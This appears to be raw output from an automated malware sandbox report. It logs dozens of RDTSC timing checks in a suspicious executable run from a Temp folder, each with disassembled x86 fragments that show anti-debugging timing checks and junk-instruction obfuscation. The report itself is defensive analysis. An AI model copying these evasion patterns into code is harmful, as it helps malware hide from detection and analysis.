Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AC8 second address: D58ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58C3D second address: D58C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58D7C second address: D58D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CC910586h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jc 00007FC4CC910586h 0x00000012 jmp 00007FC4CC91058Ah 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F17 second address: D58F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F1F second address: D58F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F33 second address: D58F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590B9 second address: D590BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590BD second address: D590C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590C3 second address: D590C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59244 second address: D5924F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1DCE1 second address: D1DCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 js 00007FC4CC91058Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B52 second address: D59B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6ADBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B61 second address: D59B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B65 second address: D59B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59EB9 second address: D59ECF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC4CC910586h 0x00000008 jmp 00007FC4CC91058Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5A2F1 second address: D5A319 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CCEF6AECh 0x00000008 jmp 00007FC4CCEF6AE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC4CCEF6AD6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5A319 second address: D5A31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5F66E second address: D5F68B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FAA4 second address: D5FAAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FAAA second address: D5FABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CCEF6ADFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5FBAB second address: D5FBC7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CC910590h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5EC8F second address: D5EC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610AB second address: D610B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610B0 second address: D610B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D610B7 second address: D610D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007FC4CC910598h 0x0000000d jmp 00007FC4CC91058Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D2473D second address: D2476E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CCEF6AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC4CCEF6AE1h 0x00000011 jmp 00007FC4CCEF6ADDh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D2476E second address: D2477A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D674C1 second address: D67507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 jmp 00007FC4CCEF6AE1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FC4CCEF6AE9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67666 second address: D67685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910599h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67685 second address: D676C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC4CCEF6AF3h 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007FC4CCEF6AE0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D676C1 second address: D676EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FC4CC91058Ch 0x0000000b je 00007FC4CC910586h 0x00000011 jnl 00007FC4CC910586h 0x00000017 jl 00007FC4CC910586h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FC4CC910586h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D67839 second address: D6783D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6783D second address: D6785A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jmp 00007FC4CC91058Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D68EAF second address: D68EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D690EF second address: D690F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69403 second address: D69407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69610 second address: D69614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69614 second address: D69622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69BA0 second address: D69BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69BA6 second address: D69BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D69C82 second address: D69C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6A059 second address: D6A096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FC4CCEF6ADCh 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC4CCEF6AE7h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6A615 second address: D6A675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FC4CC910591h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FC4CC910588h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D303Fh], edi 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2B0Dh] 0x00000036 sub dword ptr [ebp+122D2F50h], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FC4CC910590h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6A675 second address: D6A67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC4CCEF6AD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6AFE5 second address: D6AFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6AE64 second address: D6AE6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6BFC5 second address: D6BFCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6BFCB second address: D6BFD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6D571 second address: D6D586 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007FC4CC910586h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6D586 second address: D6D58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6D58C second address: D6D590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6E117 second address: D6E11B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6E11B second address: D6E121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6E121 second address: D6E199 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC4CCEF6AD8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FC4CCEF6ADFh 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2F46h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FC4CCEF6AD8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 pushad 0x00000039 mov edi, dword ptr [ebp+122D351Ch] 0x0000003f mov esi, dword ptr [ebp+122D3539h] 0x00000045 popad 0x00000046 jmp 00007FC4CCEF6AE8h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6E199 second address: D6E1A3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D6F655 second address: D6F65B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7593C second address: D75942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D75942 second address: D7599F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FC4CCEF6AD8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jnc 00007FC4CCEF6AD9h 0x0000002f or dword ptr [ebp+12449C02h], ecx 0x00000035 push 00000000h 0x00000037 mov bx, ax 0x0000003a xor edi, dword ptr [ebp+122D1DA3h] 0x00000040 push 00000000h 0x00000042 sbb bh, 0000002Eh 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D768D1 second address: D768D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D77A83 second address: D77AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FC4CCEF6AD8h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D77AAA second address: D77AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79A21 second address: D79A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79A26 second address: D79A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FC4CC910586h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FC4CC910597h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D79A4E second address: D79A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7B9DC second address: D7B9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7C997 second address: D7C9A9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7DAB0 second address: D7DAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7DAB6 second address: D7DAEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FC4CCEF6AE9h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7FA98 second address: D7FA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7FA9C second address: D7FADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FC4CCEF6AD6h 0x00000010 jmp 00007FC4CCEF6AE9h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D7FADD second address: D7FB02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC4CC910590h 0x0000000c jc 00007FC4CC910586h 0x00000012 jg 00007FC4CC910586h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D81218 second address: D81231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D81231 second address: D8124E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D830DA second address: D830E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D830E3 second address: D8315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC4CC910588h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D1D31h] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FC4CC910588h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Ah 